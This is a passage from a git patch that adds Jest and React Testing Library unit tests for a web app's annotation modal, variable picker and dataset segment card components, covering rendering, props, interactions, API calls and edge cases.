+ // Act + render() + + // Assert + expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + // Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) +}) diff --git a/web/app/components/app/configuration/dataset-config/context-var/index.spec.tsx b/web/app/components/app/configuration/dataset-config/context-var/index.spec.tsx new file mode 100644 index 0000000000..69378fbb32 --- /dev/null +++ b/web/app/components/app/configuration/dataset-config/context-var/index.spec.tsx @@ -0,0 +1,299 @@ +import * as React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import ContextVar from './index' +import type { Props } from './var-picker' + +// Mock external dependencies only +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +type PortalToFollowElemProps = { + children: React.ReactNode + open?: boolean + onOpenChange?: (open: boolean) => void +} +type PortalToFollowElemTriggerProps = React.HTMLAttributes & { children?: React.ReactNode; asChild?: boolean } +type PortalToFollowElemContentProps = React.HTMLAttributes & { children?: React.ReactNode } + +jest.mock('@/app/components/base/portal-to-follow-elem', () => { + const PortalContext = React.createContext({ open: false }) + + const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => { + return ( + +
{children}
+
+ ) + } + + const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => { + const { open } = React.useContext(PortalContext) + if (!open) return null + return ( +
+ {children} +
+ ) + } + + const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => { + if (asChild && React.isValidElement(children)) { + return React.cloneElement(children, { + ...props, + 'data-testid': 'portal-trigger', + } as React.HTMLAttributes) + } + return ( +
+ {children} +
+ ) + } + + return { + PortalToFollowElem, + PortalToFollowElemContent, + PortalToFollowElemTrigger, + } +}) + +describe('ContextVar', () => { + const mockOptions: Props['options'] = [ + { name: 'Variable 1', value: 'var1', type: 'string' }, + { name: 'Variable 2', value: 'var2', type: 'number' }, + ] + + const defaultProps: Props = { + value: 'var1', + options: mockOptions, + onChange: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should display query variable selector when options are provided', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument() + }) + + it('should show selected variable with proper formatting when value is provided', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('var1')).toBeInTheDocument() + expect(screen.getByText('{{')).toBeInTheDocument() + expect(screen.getByText('}}')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should display selected variable when value prop is provided', () => { + // Arrange + const props = { ...defaultProps, value: 'var2' } + + // Act + render() + + // Assert - Should display the selected value + expect(screen.getByText('var2')).toBeInTheDocument() + }) + + it('should show placeholder text when no value is selected', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert - Should show placeholder instead of variable + expect(screen.queryByText('var1')).not.toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should display custom tip message when notSelectedVarTip is provided', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + notSelectedVarTip: 'Select a variable', + } + + // Act + render() + + // Assert + expect(screen.getByText('Select a variable')).toBeInTheDocument() + }) + + it('should apply custom className to VarPicker when provided', () => { + // Arrange + const props = { + ...defaultProps, + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call onChange when user selects a different variable', async () => { + // Arrange + const onChange = jest.fn() + const props = { ...defaultProps, onChange } + const user = userEvent.setup() + + // Act + render() + + const triggers = screen.getAllByTestId('portal-trigger') + const varPickerTrigger = triggers[triggers.length - 1] + + await user.click(varPickerTrigger) + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + + // Select a different option + const options = screen.getAllByText('var2') + expect(options.length).toBeGreaterThan(0) + await user.click(options[0]) + + // Assert + expect(onChange).toHaveBeenCalledWith('var2') + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + + it('should toggle dropdown when clicking the trigger button', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const triggers = screen.getAllByTestId('portal-trigger') + const varPickerTrigger = triggers[triggers.length - 1] + + // Open dropdown + await user.click(varPickerTrigger) + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + + // Close dropdown + await user.click(varPickerTrigger) + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle undefined value gracefully', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + expect(screen.queryByText('var1')).not.toBeInTheDocument() + }) + + it('should handle empty options array', () => { + // Arrange + const props = { + ...defaultProps, + options: [], + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should handle null value without crashing', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.title')).toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should handle options with different data types', () => { + // Arrange + const props = { + ...defaultProps, + options: [ + { name: 'String Var', value: 'strVar', type: 'string' }, + { name: 'Number Var', value: '42', type: 'number' }, + { name: 'Boolean Var', value: 'true', type: 'boolean' }, + ], + value: 'strVar', + } + + // Act + render() + + // Assert + expect(screen.getByText('strVar')).toBeInTheDocument() + expect(screen.getByText('{{')).toBeInTheDocument() + expect(screen.getByText('}}')).toBeInTheDocument() + }) + + it('should render variable names with special characters safely', () => { + // Arrange + const props = { + ...defaultProps, + options: [ + { name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' }, + ], + value: 'specialVar', + } + + // Act + render() + + // Assert + expect(screen.getByText('specialVar')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/configuration/dataset-config/context-var/var-picker.spec.tsx b/web/app/components/app/configuration/dataset-config/context-var/var-picker.spec.tsx new file mode 100644 index 0000000000..cb46ce9788 --- /dev/null +++ b/web/app/components/app/configuration/dataset-config/context-var/var-picker.spec.tsx @@ -0,0 +1,392 @@ +import * as React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import VarPicker, { type Props } from './var-picker' + +// Mock external dependencies only +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +type PortalToFollowElemProps = { + children: React.ReactNode + open?: boolean + onOpenChange?: (open: boolean) => void +} +type PortalToFollowElemTriggerProps = React.HTMLAttributes & { children?: React.ReactNode; asChild?: boolean } +type PortalToFollowElemContentProps = React.HTMLAttributes & { children?: React.ReactNode } + +jest.mock('@/app/components/base/portal-to-follow-elem', () => { + const PortalContext = React.createContext({ open: false }) + + const PortalToFollowElem = ({ children, open }: PortalToFollowElemProps) => { + return ( + +
{children}
+
+ ) + } + + const PortalToFollowElemContent = ({ children, ...props }: PortalToFollowElemContentProps) => { + const { open } = React.useContext(PortalContext) + if (!open) return null + return ( +
+ {children} +
+ ) + } + + const PortalToFollowElemTrigger = ({ children, asChild, ...props }: PortalToFollowElemTriggerProps) => { + if (asChild && React.isValidElement(children)) { + return React.cloneElement(children, { + ...props, + 'data-testid': 'portal-trigger', + } as React.HTMLAttributes) + } + return ( +
+ {children} +
+ ) + } + + return { + PortalToFollowElem, + PortalToFollowElemContent, + PortalToFollowElemTrigger, + } +}) + +describe('VarPicker', () => { + const mockOptions: Props['options'] = [ + { name: 'Variable 1', value: 'var1', type: 'string' }, + { name: 'Variable 2', value: 'var2', type: 'number' }, + { name: 'Variable 3', value: 'var3', type: 'boolean' }, + ] + + const defaultProps: Props = { + value: 'var1', + options: mockOptions, + onChange: jest.fn(), + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render variable picker with dropdown trigger', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + expect(screen.getByText('var1')).toBeInTheDocument() + }) + + it('should display selected variable with type icon when value is provided', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.getByText('var1')).toBeInTheDocument() + expect(screen.getByText('{{')).toBeInTheDocument() + expect(screen.getByText('}}')).toBeInTheDocument() + // IconTypeIcon should be rendered (check for svg icon) + expect(document.querySelector('svg')).toBeInTheDocument() + }) + + it('should show placeholder text when no value is selected', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.queryByText('var1')).not.toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should display custom tip message when notSelectedVarTip is provided', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + notSelectedVarTip: 'Select a variable', + } + + // Act + render() + + // Assert + expect(screen.getByText('Select a variable')).toBeInTheDocument() + }) + + it('should render dropdown indicator icon', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Trigger should be present + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className to wrapper', () => { + // Arrange + const props = { + ...defaultProps, + className: 'custom-class', + } + + // Act + const { container } = render() + + // Assert + expect(container.querySelector('.custom-class')).toBeInTheDocument() + }) + + it('should apply custom triggerClassName to trigger button', () => { + // Arrange + const props = { + ...defaultProps, + triggerClassName: 'custom-trigger-class', + } + + // Act + render() + + // Assert + expect(screen.getByTestId('portal-trigger')).toHaveClass('custom-trigger-class') + }) + + it('should display selected value with proper formatting', () => { + // Arrange + const props = { + ...defaultProps, + value: 'customVar', + options: [ + { name: 'Custom Variable', value: 'customVar', type: 'string' }, + ], + } + + // Act + render() + + // Assert + expect(screen.getByText('customVar')).toBeInTheDocument() + expect(screen.getByText('{{')).toBeInTheDocument() + expect(screen.getByText('}}')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should open dropdown when clicking the trigger button', async () => { + // Arrange + const onChange = jest.fn() + const props = { ...defaultProps, onChange } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByTestId('portal-trigger')) + + // Assert + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + }) + + it('should call onChange and close dropdown when selecting an option', async () => { + // Arrange + const onChange = jest.fn() + const props = { ...defaultProps, onChange } + const user = userEvent.setup() + + // Act + render() + + // Open dropdown + await user.click(screen.getByTestId('portal-trigger')) + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + + // Select a different option + const options = screen.getAllByText('var2') + expect(options.length).toBeGreaterThan(0) + await user.click(options[0]) + + // Assert + expect(onChange).toHaveBeenCalledWith('var2') + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + + it('should toggle dropdown when clicking trigger button multiple times', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const trigger = screen.getByTestId('portal-trigger') + + // Open dropdown + await user.click(trigger) + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + + // Close dropdown + await user.click(trigger) + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed dropdown', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + + it('should toggle dropdown state on trigger click', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const trigger = screen.getByTestId('portal-trigger') + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + + // Open dropdown + await user.click(trigger) + expect(screen.getByTestId('portal-content')).toBeInTheDocument() + + // Close dropdown + await user.click(trigger) + expect(screen.queryByTestId('portal-content')).not.toBeInTheDocument() + }) + + it('should preserve selected value when dropdown is closed without selection', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + // Open and close dropdown without selecting anything + const trigger = screen.getByTestId('portal-trigger') + await user.click(trigger) + await user.click(trigger) + + // Assert + expect(screen.getByText('var1')).toBeInTheDocument() // Original value still displayed + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle undefined value gracefully', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + + it('should handle empty options array', () => { + // Arrange + const props = { + ...defaultProps, + options: [], + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should handle null value without crashing', () => { + // Arrange + const props = { + ...defaultProps, + value: undefined, + } + + // Act + render() + + // Assert + expect(screen.getByText('appDebug.feature.dataSet.queryVariable.choosePlaceholder')).toBeInTheDocument() + }) + + it('should handle variable names with special characters safely', () => { + // Arrange + const props = { + ...defaultProps, + options: [ + { name: 'Variable with & < > " \' characters', value: 'specialVar', type: 'string' }, + ], + value: 'specialVar', + } + + // Act + render() + + // Assert + expect(screen.getByText('specialVar')).toBeInTheDocument() + }) + + it('should handle long variable names', () => { + // Arrange + const props = { + ...defaultProps, + options: [ + { name: 'A very long variable name that should be truncated', value: 'longVar', type: 'string' }, + ], + value: 'longVar', + } + + // Act + render() + + // Assert + expect(screen.getByText('longVar')).toBeInTheDocument() + expect(screen.getByTestId('portal-trigger')).toBeInTheDocument() + }) + }) +}) From 581b62cf01ae98dab37439a50b1c84234dd665db Mon Sep 17 00:00:00 2001 From: Coding On Star <447357187@qq.com> Date: Wed, 17 Dec 2025 10:26:58 +0800 Subject: [PATCH 64/68] feat: add automated tests for pipeline setting (#29478) Co-authored-by: CodingOnStar --- .../documents/detail/completed/index.tsx | 2 +- .../completed/segment-card/index.spec.tsx | 1204 +++++++++++++++++ .../detail/completed/segment-card/index.tsx | 6 +- .../skeleton/parent-chunk-card-skeleton.tsx | 2 +- .../datasets/documents/detail/context.ts | 2 +- .../settings/pipeline-settings/index.spec.tsx | 786 +++++++++++ .../pipeline-settings/left-header.tsx | 1 + .../process-documents/index.spec.tsx | 573 ++++++++ .../documents/status-item/index.spec.tsx | 968 +++++++++++++ .../datasets/documents/status-item/index.tsx | 1 + web/app/components/header/indicator/index.tsx | 1 + 11 files changed, 3542 insertions(+), 4 deletions(-) create mode 100644 web/app/components/datasets/documents/detail/completed/segment-card/index.spec.tsx create mode 100644 web/app/components/datasets/documents/detail/settings/pipeline-settings/index.spec.tsx create mode 100644 web/app/components/datasets/documents/detail/settings/pipeline-settings/process-documents/index.spec.tsx create mode 100644 web/app/components/datasets/documents/status-item/index.spec.tsx diff --git a/web/app/components/datasets/documents/detail/completed/index.tsx b/web/app/components/datasets/documents/detail/completed/index.tsx index a3f76d9481..ad405f6b15 100644 --- a/web/app/components/datasets/documents/detail/completed/index.tsx +++ b/web/app/components/datasets/documents/detail/completed/index.tsx @@ -62,7 +62,7 @@ type CurrChildChunkType = { showModal: boolean } -type SegmentListContextValue = { +export type SegmentListContextValue = { isCollapsed: boolean fullScreen: boolean toggleFullScreen: (fullscreen?: boolean) => void diff --git a/web/app/components/datasets/documents/detail/completed/segment-card/index.spec.tsx b/web/app/components/datasets/documents/detail/completed/segment-card/index.spec.tsx new file mode 100644 index 0000000000..ced1bf05a9 --- /dev/null +++ b/web/app/components/datasets/documents/detail/completed/segment-card/index.spec.tsx @@ -0,0 +1,1204 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import SegmentCard from './index' +import { type Attachment, type ChildChunkDetail, ChunkingMode, type ParentMode, type SegmentDetailModel } from '@/models/datasets' +import type { DocumentContextValue } from '@/app/components/datasets/documents/detail/context' +import type { SegmentListContextValue } from '@/app/components/datasets/documents/detail/completed' + +// Mock react-i18next - external dependency +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string, options?: { count?: number }) => { + if (key === 'datasetDocuments.segment.characters') + return options?.count === 1 ? 'character' : 'characters' + if (key === 'datasetDocuments.segment.childChunks') + return options?.count === 1 ? 'child chunk' : 'child chunks' + return key + }, + }), +})) + +// ============================================================================ +// Context Mocks - need to control test scenarios +// ============================================================================ + +const mockDocForm = { current: ChunkingMode.text } +const mockParentMode = { current: 'paragraph' as ParentMode } + +jest.mock('../../context', () => ({ + useDocumentContext: (selector: (value: DocumentContextValue) => unknown) => { + const value: DocumentContextValue = { + datasetId: 'test-dataset-id', + documentId: 'test-document-id', + docForm: mockDocForm.current, + parentMode: mockParentMode.current, + } + return selector(value) + }, +})) + +const mockIsCollapsed = { current: true } +jest.mock('../index', () => ({ + useSegmentListContext: (selector: (value: SegmentListContextValue) => unknown) => { + const value: SegmentListContextValue = { + isCollapsed: mockIsCollapsed.current, + fullScreen: false, + toggleFullScreen: jest.fn(), + currSegment: { showModal: false }, + currChildChunk: { showModal: false }, + } + return selector(value) + }, +})) + +// ============================================================================ +// Component Mocks - components with complex ESM dependencies (ky, react-pdf-highlighter, etc.) +// These are mocked to avoid Jest ESM parsing issues, not because they're external +// ============================================================================ + +// StatusItem has deep dependency: use-document hooks → service/base → ky (ESM) +jest.mock('../../../status-item', () => ({ + __esModule: true, + default: ({ status, reverse, textCls }: { status: string; reverse?: boolean; textCls?: string }) => ( +
+ Status: {status} +
+ ), +})) + +// ImageList has deep dependency: FileThumb → file-uploader → ky, react-pdf-highlighter (ESM) +jest.mock('@/app/components/datasets/common/image-list', () => ({ + __esModule: true, + default: ({ images, size, className }: { images: Array<{ sourceUrl: string; name: string }>; size?: string; className?: string }) => ( +
+ {images.map((img, idx: number) => ( + {img.name} + ))} +
+ ), +})) + +// Markdown uses next/dynamic and react-syntax-highlighter (ESM) +jest.mock('@/app/components/base/markdown', () => ({ + __esModule: true, + Markdown: ({ content, className }: { content: string; className?: string }) => ( +
{content}
+ ), +})) + +// ============================================================================ +// Test Data Factories +// ============================================================================ + +const createMockAttachment = (overrides: Partial = {}): Attachment => ({ + id: 'attachment-1', + name: 'test-image.png', + size: 1024, + extension: 'png', + mime_type: 'image/png', + source_url: 'https://example.com/test-image.png', + ...overrides, +}) + +const createMockChildChunk = (overrides: Partial = {}): ChildChunkDetail => ({ + id: 'child-chunk-1', + position: 1, + segment_id: 'segment-1', + content: 'Child chunk content', + word_count: 100, + created_at: 1700000000, + updated_at: 1700000000, + type: 'automatic', + ...overrides, +}) + +const createMockSegmentDetail = (overrides: Partial = {}): SegmentDetailModel & { document?: { name: string } } => ({ + id: 'segment-1', + position: 1, + document_id: 'doc-1', + content: 'Test segment content', + sign_content: 'Test signed content', + word_count: 100, + tokens: 50, + keywords: ['keyword1', 'keyword2'], + index_node_id: 'index-1', + index_node_hash: 'hash-1', + hit_count: 10, + enabled: true, + disabled_at: 0, + disabled_by: '', + status: 'completed', + created_by: 'user-1', + created_at: 1700000000, + indexing_at: 1700000100, + completed_at: 1700000200, + error: null, + stopped_at: 0, + updated_at: 1700000000, + attachments: [], + child_chunks: [], + document: { name: 'Test Document' }, + ...overrides, +}) + +const defaultFocused = { segmentIndex: false, segmentContent: false } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('SegmentCard', () => { + beforeEach(() => { + jest.clearAllMocks() + mockDocForm.current = ChunkingMode.text + mockParentMode.current = 'paragraph' + mockIsCollapsed.current = true + }) + + // -------------------------------------------------------------------------- + // Rendering Tests + // -------------------------------------------------------------------------- + describe('Rendering', () => { + it('should render loading skeleton when loading is true', () => { + render() + + // ParentChunkCardSkeleton should render + expect(screen.getByTestId('parent-chunk-card-skeleton')).toBeInTheDocument() + }) + + it('should render segment card content when loading is false', () => { + const detail = createMockSegmentDetail() + + render() + + // ChunkContent shows sign_content first, then content + expect(screen.getByText('Test signed content')).toBeInTheDocument() + }) + + it('should render segment index tag with correct position', () => { + const detail = createMockSegmentDetail({ position: 5 }) + + render() + + expect(screen.getByText(/Chunk-05/i)).toBeInTheDocument() + }) + + it('should render word count text', () => { + const detail = createMockSegmentDetail({ word_count: 250 }) + + render() + + expect(screen.getByText('250 characters')).toBeInTheDocument() + }) + + it('should render hit count text', () => { + const detail = createMockSegmentDetail({ hit_count: 42 }) + + render() + + expect(screen.getByText('42 datasetDocuments.segment.hitCount')).toBeInTheDocument() + }) + + it('should apply custom className', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const card = screen.getByTestId('segment-card') + expect(card).toHaveClass('custom-class') + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests + // -------------------------------------------------------------------------- + describe('Props', () => { + it('should use default empty object when detail is undefined', () => { + render() + + expect(screen.getByText(/Chunk/i)).toBeInTheDocument() + }) + + it('should handle archived prop correctly - switch should be disabled', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const switchElement = screen.getByRole('switch') + expect(switchElement).toHaveClass('!cursor-not-allowed') + }) + + it('should show action buttons when embeddingAvailable is true', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + expect(screen.getByTestId('segment-edit-button')).toBeInTheDocument() + expect(screen.getByTestId('segment-delete-button')).toBeInTheDocument() + expect(screen.getByRole('switch')).toBeInTheDocument() + }) + + it('should not show action buttons when embeddingAvailable is false', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + expect(screen.queryByRole('switch')).not.toBeInTheDocument() + }) + + it('should apply focused styles when segmentContent is focused', () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const card = screen.getByTestId('segment-card') + expect(card).toHaveClass('bg-dataset-chunk-detail-card-hover-bg') + }) + }) + + // -------------------------------------------------------------------------- + // State Management Tests + // -------------------------------------------------------------------------- + describe('State Management', () => { + it('should toggle delete confirmation modal when delete button clicked', async () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const deleteButton = screen.getByTestId('segment-delete-button') + fireEvent.click(deleteButton) + + await waitFor(() => { + expect(screen.getByText('datasetDocuments.segment.delete')).toBeInTheDocument() + }) + }) + + it('should close delete confirmation modal when cancel is clicked', async () => { + const detail = createMockSegmentDetail() + + render( + , + ) + + const deleteButton = screen.getByTestId('segment-delete-button') + fireEvent.click(deleteButton) + + await waitFor(() => { + expect(screen.getByText('datasetDocuments.segment.delete')).toBeInTheDocument() + }) + + fireEvent.click(screen.getByText('common.operation.cancel')) + + await waitFor(() => { + expect(screen.queryByText('datasetDocuments.segment.delete')).not.toBeInTheDocument() + }) + }) + }) + + // -------------------------------------------------------------------------- + // Callback Tests + // -------------------------------------------------------------------------- + describe('Callbacks', () => { + it('should call onClick when card is clicked in general mode', () => { + const onClick = jest.fn() + const detail = createMockSegmentDetail() + mockDocForm.current = ChunkingMode.text + + render( + , + ) + + const card = screen.getByTestId('segment-card') + fireEvent.click(card) + + expect(onClick).toHaveBeenCalledTimes(1) + }) + + it('should not call onClick when card is clicked in full-doc mode', () => { + const onClick = jest.fn() + const detail = createMockSegmentDetail() + mockDocForm.current = ChunkingMode.parentChild + mockParentMode.current = 'full-doc' + + render( + , + ) + + const card = screen.getByTestId('segment-card') + fireEvent.click(card) + + 